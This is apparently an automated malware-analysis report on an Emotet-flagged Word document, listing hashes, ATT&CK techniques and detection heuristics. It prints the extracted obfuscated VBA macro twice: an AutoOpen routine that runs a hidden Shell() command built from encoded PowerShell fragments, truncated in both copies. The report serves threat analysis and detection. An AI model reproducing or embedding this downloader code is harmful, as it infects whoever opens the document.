Emotet Office (OLE) malware analysis — malicious · a6d00bc4d9691d9b

MALICIOUS

Office (OLE)

105.0 KB Created: 2018-06-01 15:24:00 Authoring application: Microsoft Office Word First seen: 2018-06-21

MD5: 6cbaaffe67d047108aca51648f20828f SHA-1: e84a674eaf35880f2bfb098b09c4397af9622219 SHA-256: a6d00bc4d9691d9bf1fac9ffff93c4307982ffca9c04f27b93b7c0a7216ef1df

242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a critical OLE_VBA_SHELL firing and a critical OLE_VBA_PCODE_AUTOEXEC_EXEC firing, indicating the presence of VBA macros that execute commands. The Autoopen macro is present and calls a function that uses the Shell() command. This is consistent with Emotet's typical behavior of downloading and executing a second-stage payload. The ClamAV detection also explicitly names Emotet.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-7076471-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7076471-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9910 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9910 bytes
SHA-256: `901bded496991dc0ada89bc7c5cb8cd6d589b177ec22cd172db4e48a926e8b12`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "PhFlrjYcnObvl" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function cQRHVjb() On Error Resume Next SSJSv = 77174 + Log(21393) - HrVElF / Atn(90400) / HCRqz / rIjfTm WDpOsr = CSng(39508 * CInt(47463) + 22249 - 86224) WdzfzK = 39783 + Log(71442) - FbVpLN / Atn(70809) / AlQUYP / ojqtNa vJoTVi = CSng(24059 * CInt(21349) + 42321 - 20765) cQRHVjb = JMOpKNranZ + Shell(QNYNQias + Chr(vbKeyP) + nMzwGJi + XnEFnBOVwi + dwfks + AiOanIujQCX + UVLbYB, wEjAvTYmnH + vbHide + PdHtwWd) wdvhzC = 59151 + Log(12880) - YZcIwO / Atn(29013) / RUbXNG / LBsrCN PFmZlo = CSng(14156 * CInt(61915) + 76912 - 28071) End Function Sub Autoopen() On Error Resume Next jaWhf = 39856 + Log(14210) - VtBjK / Atn(72005) / PVwJm / jiJWW cajlj = CSng(24504 * CInt(31062) + 63795 - 62076) cQRHVjb iWYkj = 84190 + Log(92247) - WboOY / Atn(72642) / ibDzsM / Iwism VWuEq = CSng(11940 * CInt(83516) + 53948 - 71784) End Sub Attribute VB_Name = "UomwAvk" Function nMzwGJi() On Error Resume Next KwzTia = 28712 + Log(33682) - LQpujh / Atn(20412) / jzWsd / QRipIo XHWiqE = CSng(1805 * CInt(13241) + 43633 - 1292) HEsYiU = "owe" + "rsHeLL -" + "e SQBOAH" + "YAb" + "wBLAG" uFMvT = 46289 + Log(77046) - jQZPXj / Atn(64144) / jCDlG / vnISPp JEKwIz = CSng(44712 * CInt(41967) + 40527 - 95913) hkNAPmkaHwO = "UALQBFA" + "HgAUAByA" + "EUAcwBzAGkATwB" + "uACgAIABOA" + "EUAdwAt" + "AE8AYgBqAEUAQwB" + "UACAASQB" + "PAC4AQwB" + "vA" BVIUw = 85330 + Log(97962) - JoUESP / Atn(14050) / KZnAI / KWLPQO KuLEzj = CSng(71892 * CInt(39114) + 53026 - 78505) DKiQEjmbZHP = "G0AUABSAEUAcw" + "BzAGkAbwBOAC" + "4AZABFAGYA" + "bABhAFQA" + "ZQBTAHQAcgB" + "lAE" + "EAbQA" TUjnp = 99798 + Log(83417) - BfNwhw / Atn(96204) / KmIjc / IzuIzV VzikXh = CSng(76962 * CInt(34279) + 44686 - 62968) drXVb = "oAF" + "sAUwB5AFMA" + "dABFAG0ALgBJA" + "G8AL" + "gBNAEUA" + "TQBvAFIAeQBzAF" + "QAUgBFAGEAb" + "QBdACA" + "AWwBDAE" + "8ATgBWAEUAcgB" XjNGw = 95158 + Log(57777) - zfbiT / Atn(10545) / jLhthA / DfhiM PKlmF = CSng(93771 * CInt(22390) + 90926 - 43325) wwiUY = "0AF0AOgA6A" + "EYAcgBvAG0" + "AYgBh" + "AFMARQA2" + "ADQA" + "cwB0AFIAaQBuAG" + "cAKAAgACcAVAB" + "aAEYAaAB" + "hAD" + "kAcwB3A" CzisW = 600 + Log(89580) - Pijzc / Atn(70142) / zLBdhZ / lTspu cWtsNJ = CSng(59936 * CInt(92380) + 5974 - 15046) RkhLoN = "EUASQBhAC8A" + "RAAvAFkAZgB" + "SAEQAQwBWAG" + "oAQgB0AHA" + "AYgBkAGYAUgAxA" CkSPhb = 34627 + Log(64650) - IGlJR / Atn(78127) / jMKAhG / mtkqk FiwDC = CSng(51344 * CInt(94077) + 14090 - 6224) mLFKFkPJi = "FEAegBTAE" + "8AZ" + "wBRA" + "GEAM" + "gBtAHoARAA" + "3AFoA" + "SwBPAGY" + "AYgBBAGkASwA3AF" + "UAVwBXAHoAYgAy" + "AE4AVQAwAFcAOAB" saHtf = 43385 + Log(71665) - bYhvjs / Atn(14770) / wifVw / hOvaJh qrVjI = CSng(35632 * CInt(50172) + 48946 - 25048) twdFALki = "0ADkAMwA1ADIA" + "NQBzAGgAcg" + "BQAHYANQBPAGYA" + "dQAzAHQATQBGA" + "HYAdABPA" + "DUANwBuAEwAM" + "gBpAFIAMAB" + "KADcA" + "bgBuAEUAT" + "ABZADgA" QHAPLl = 19196 + Log(96267) - wkdRc / Atn(64130) / HsszF / EckjM bZhsj = CSng(9011 * CInt(28278) + 26783 - 91916) qMqfRRRQr = "RQBmAHgAbgBXAD" + "YAQw" + "A3AFIAZgBs" + "AHIARAB3AD" + "QAZwBEAEQAMQB" + "tAHIAZgBWADU" + "AWABjAGYARAA0AC" + "sASQBDADQ" VdlcF = 70806 + Log(44422) - ZszBL / Atn(64604) / PVDDXf / ZvWiOr NNTLmW = CSng(29002 * CInt(21740) + 54838 - 13363) kistNSKuMU = "AUgBCAHgAWgA" + "vAGsATAA4" + "AHMATwA1" + "AFoAUwBqAGUASQB" + "oAGkA" + "egBkA" nMzwGJi = HEsYiU + hkNAPmkaHwO + DKiQEjmbZHP + drXVb + wwiUY + RkhLoN + mLFKFkPJi + twdFALki + qMqfRRRQr + kistNSKuMU End Function Function XnEFnBOVwi() On Error Resume Next FWHTP = 49251 + Log(28361) - MTjLKX / Atn(80507) / EqFbWf / MffqY REswk = CSng(34923 * CInt(16290) + 46084 - 12104) EwsMjZ = "GQAVwBBAHIATwB" + "iAE0AZwA1ADM" + "AYQBaAGwA" + "TQA" + "1ADYAaQBJAE4A" zPOfad = 4675 + Log(17828) - wjKUWf / Atn(94654) / Dunji / puPqOZ hSzKI = CSng(23924 * CInt(14396) + 1428 - 8 ... (truncated)

SHA-256: 901bded496991dc0ada89bc7c5cb8cd6d589b177ec22cd172db4e48a926e8b12

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "PhFlrjYcnObvl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function cQRHVjb()
On Error Resume Next
SSJSv = 77174 + Log(21393) - HrVElF / Atn(90400) / HCRqz / rIjfTm
WDpOsr = CSng(39508 * CInt(47463) + 22249 - 86224)
WdzfzK = 39783 + Log(71442) - FbVpLN / Atn(70809) / AlQUYP / ojqtNa
vJoTVi = CSng(24059 * CInt(21349) + 42321 - 20765)
cQRHVjb = JMOpKNranZ + Shell(QNYNQias + Chr(vbKeyP) + nMzwGJi + XnEFnBOVwi + dwfks + AiOanIujQCX + UVLbYB, wEjAvTYmnH + vbHide + PdHtwWd)
wdvhzC = 59151 + Log(12880) - YZcIwO / Atn(29013) / RUbXNG / LBsrCN
PFmZlo = CSng(14156 * CInt(61915) + 76912 - 28071)
End Function
Sub Autoopen()
On Error Resume Next
jaWhf = 39856 + Log(14210) - VtBjK / Atn(72005) / PVwJm / jiJWW
cajlj = CSng(24504 * CInt(31062) + 63795 - 62076)
cQRHVjb
iWYkj = 84190 + Log(92247) - WboOY / Atn(72642) / ibDzsM / Iwism
VWuEq = CSng(11940 * CInt(83516) + 53948 - 71784)
End Sub


Attribute VB_Name = "UomwAvk"
Function nMzwGJi()
On Error Resume Next
KwzTia = 28712 + Log(33682) - LQpujh / Atn(20412) / jzWsd / QRipIo
XHWiqE = CSng(1805 * CInt(13241) + 43633 - 1292)
HEsYiU = "owe" + "rsHeLL -" + "e SQBOAH" + "YAb" + "wBLAG"
uFMvT = 46289 + Log(77046) - jQZPXj / Atn(64144) / jCDlG / vnISPp
JEKwIz = CSng(44712 * CInt(41967) + 40527 - 95913)
hkNAPmkaHwO = "UALQBFA" + "HgAUAByA" + "EUAcwBzAGkATwB" + "uACgAIABOA" + "EUAdwAt" + "AE8AYgBqAEUAQwB" + "UACAASQB" + "PAC4AQwB" + "vA"
BVIUw = 85330 + Log(97962) - JoUESP / Atn(14050) / KZnAI / KWLPQO
KuLEzj = CSng(71892 * CInt(39114) + 53026 - 78505)
DKiQEjmbZHP = "G0AUABSAEUAcw" + "BzAGkAbwBOAC" + "4AZABFAGYA" + "bABhAFQA" + "ZQBTAHQAcgB" + "lAE" + "EAbQA"
TUjnp = 99798 + Log(83417) - BfNwhw / Atn(96204) / KmIjc / IzuIzV
VzikXh = CSng(76962 * CInt(34279) + 44686 - 62968)
drXVb = "oAF" + "sAUwB5AFMA" + "dABFAG0ALgBJA" + "G8AL" + "gBNAEUA" + "TQBvAFIAeQBzAF" + "QAUgBFAGEAb" + "QBdACA" + "AWwBDAE" + "8ATgBWAEUAcgB"
XjNGw = 95158 + Log(57777) - zfbiT / Atn(10545) / jLhthA / DfhiM
PKlmF = CSng(93771 * CInt(22390) + 90926 - 43325)
wwiUY = "0AF0AOgA6A" + "EYAcgBvAG0" + "AYgBh" + "AFMARQA2" + "ADQA" + "cwB0AFIAaQBuAG" + "cAKAAgACcAVAB" + "aAEYAaAB" + "hAD" + "kAcwB3A"
CzisW = 600 + Log(89580) - Pijzc / Atn(70142) / zLBdhZ / lTspu
cWtsNJ = CSng(59936 * CInt(92380) + 5974 - 15046)
RkhLoN = "EUASQBhAC8A" + "RAAvAFkAZgB" + "SAEQAQwBWAG" + "oAQgB0AHA" + "AYgBkAGYAUgAxA"
CkSPhb = 34627 + Log(64650) - IGlJR / Atn(78127) / jMKAhG / mtkqk
FiwDC = CSng(51344 * CInt(94077) + 14090 - 6224)
mLFKFkPJi = "FEAegBTAE" + "8AZ" + "wBRA" + "GEAM" + "gBtAHoARAA" + "3AFoA" + "SwBPAGY" + "AYgBBAGkASwA3AF" + "UAVwBXAHoAYgAy" + "AE4AVQAwAFcAOAB"
saHtf = 43385 + Log(71665) - bYhvjs / Atn(14770) / wifVw / hOvaJh
qrVjI = CSng(35632 * CInt(50172) + 48946 - 25048)
twdFALki = "0ADkAMwA1ADIA" + "NQBzAGgAcg" + "BQAHYANQBPAGYA" + "dQAzAHQATQBGA" + "HYAdABPA" + "DUANwBuAEwAM" + "gBpAFIAMAB" + "KADcA" + "bgBuAEUAT" + "ABZADgA"
QHAPLl = 19196 + Log(96267) - wkdRc / Atn(64130) / HsszF / EckjM
bZhsj = CSng(9011 * CInt(28278) + 26783 - 91916)
qMqfRRRQr = "RQBmAHgAbgBXAD" + "YAQw" + "A3AFIAZgBs" + "AHIARAB3AD" + "QAZwBEAEQAMQB" + "tAHIAZgBWADU" + "AWABjAGYARAA0AC" + "sASQBDADQ"
VdlcF = 70806 + Log(44422) - ZszBL / Atn(64604) / PVDDXf / ZvWiOr
NNTLmW = CSng(29002 * CInt(21740) + 54838 - 13363)
kistNSKuMU = "AUgBCAHgAWgA" + "vAGsATAA4" + "AHMATwA1" + "AFoAUwBqAGUASQB" + "oAGkA" + "egBkA"
nMzwGJi = HEsYiU + hkNAPmkaHwO + DKiQEjmbZHP + drXVb + wwiUY + RkhLoN + mLFKFkPJi + twdFALki + qMqfRRRQr + kistNSKuMU
End Function
Function XnEFnBOVwi()
On Error Resume Next
FWHTP = 49251 + Log(28361) - MTjLKX / Atn(80507) / EqFbWf / MffqY
REswk = CSng(34923 * CInt(16290) + 46084 - 12104)
EwsMjZ = "GQAVwBBAHIATwB" + "iAE0AZwA1ADM" + "AYQBaAGwA" + "TQA" + "1ADYAaQBJAE4A"
zPOfad = 4675 + Log(17828) - wjKUWf / Atn(94654) / Dunji / puPqOZ
hSzKI = CSng(23924 * CInt(14396) + 1428 - 8
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.